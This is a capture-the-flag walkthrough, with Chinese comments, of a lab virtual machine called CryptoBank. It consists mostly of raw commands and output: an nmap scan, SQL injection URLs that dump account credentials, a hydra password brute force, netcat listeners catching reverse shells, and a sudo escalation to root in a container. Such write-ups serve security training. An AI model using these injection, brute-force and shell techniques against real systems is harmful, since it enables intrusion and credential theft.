PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 7f:4e:59:df:b7:55:49:cf:d3:12:2d:19:01:05:43:f7 (RSA) | 256 5e:1b:37:98:ab:c7:e6:ee:5f:f8:df:43:14:de:28:4e (ECDSA) |_ 256 8e:a9:90:9f:6e:51:b1:c7:26:ea:07:ac:69:28:b3:1c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: CryptoBank MAC Address: 08:00:27:1D:F7:35 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS
//数据库名 http://cryptobank.local/trade/view_loans.php?search=" union select 1,database(),3--# //cryptobank
//所有库名 http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(schema_name),3 from information_schema.schemata--# //information_schema,cryptobank,mysql,performance_schema,sys
//cryptobank库中的表名 http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='cryptobank'--# //accounts,comments,loans
//accounts表中的列名 http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='cryptobank'--# //id_account,username,password,balance,USER,HOST,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
//表中内容 http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(id_account,'--',username,'--',password,'--',balance),3 from accounts--# //1--williamdelisle--gFG7pqE5cn--87536,2--juliusthedeveloper--wJWm4CgV26--34421,3--bill.w--3Nrc2FYJMe--26321,4--johndl33t--NqRF4W85yf--1375,5--mrbitcoin--LxZjkK87nu--434455,6--spongebob--3mwZd896Me--8531,7--dreadpirateroberts--7HwAEChFP9--733456,8--deadbeef--6X7DnLF5pG--4324,9--buzzlightyear--LnBHvEhmw3--2886,10--tim--zm2gBcaxd3--857,11--patric--x8CRvHqgPp--1,12--notanirsagent--8hPx2Zqn4b--777
┌──(kali㉿kali)-[~/Documents/CryptoBank_1] └─$ hydra -L usernames -P passwords 192.168.1.104 http-get /development Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-18 02:16:02 [DATA] max 16 tasks per 1 server, overall 16 tasks, 216 login tries (l:18/p:12), ~14 tries per task [DATA] attacking http-get://192.168.1.104:80/development [80][http-get] host: 192.168.1.104 login: julius.b password: wJWm4CgV26 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-18 02:16:04
┌──(kali㉿kali)-[~/Documents/CryptoBank_1] └─$ sudo nc -lvnp 443 listening on [any] 443 ... connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 43320 bash: cannot set terminal process group (1115): Inappropriate ioctl for device bash: no job control in this shell www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ whoami <yptobank/development/tools/CommandExecution$ whoami www-data www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ id <w/cryptobank/development/tools/CommandExecution$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ uname -a <tobank/development/tools/CommandExecution$ uname -a Linux cryptobank 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ ip a <cryptobank/development/tools/CommandExecution$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:1d:f7:35 brd ff:ff:ff:ff:ff:ff inet 192.168.1.104/24 brd 192.168.1.255 scope global dynamic enp0s3 valid_lft 463sec preferred_lft 463sec inet6 fe80::a00:27ff:fe1d:f735/64 scope link valid_lft forever preferred_lft forever 3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:c0:de:21:af brd ff:ff:ff:ff:ff:ff inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0 valid_lft forever preferred_lft forever inet6 fe80::42:c0ff:fede:21af/64 scope link valid_lft forever preferred_lft forever 5: veth0fe9052@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default link/ether 52:5e:7e:9b:b6:d8 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet6 fe80::505e:7eff:fe9b:b6d8/64 scope link valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Documents/CryptoBank_1] └─$ sudo nc -lvnp 444 [sudo] password for kali: listening on [any] 444 ... connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 47398 whoami solr id uid=8983(solr) gid=8983(solr) groups=8983(solr),27(sudo) which python /usr/bin/python python -c "import pty;pty.spawn('/bin/bash')" solr@33fa86e6105f:/opt/solr/server$ sudo -l sudo -l Matching Defaults entries for solr on 33fa86e6105f: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User solr may run the following commands on 33fa86e6105f: (ALL) NOPASSWD: ALL (ALL : ALL) ALL solr@33fa86e6105f:/opt/solr/server$ sudo su sudo su [sudo] password for solr:
虽然用户权限比较明显,但是使用 sudo su 还是需要输入密码,不是很理解。
flag
尝试了 root, solr 弱口令,在容器中继续寻找 flag
1 2 3 4 5 6 7 8 9 10 11 12
solr@33fa86e6105f:/opt/solr/server$ sudo su sudo su [sudo] password for solr: solr
root@33fa86e6105f:/opt/solr-8.1.1/server# cd /root cd /root root@33fa86e6105f:~# ls ls flag.txt root@33fa86e6105f:~# cat flag.txt cat flag.txt Good job here our secure cold wallet flag{s4t0sh1n4k4m0t0}
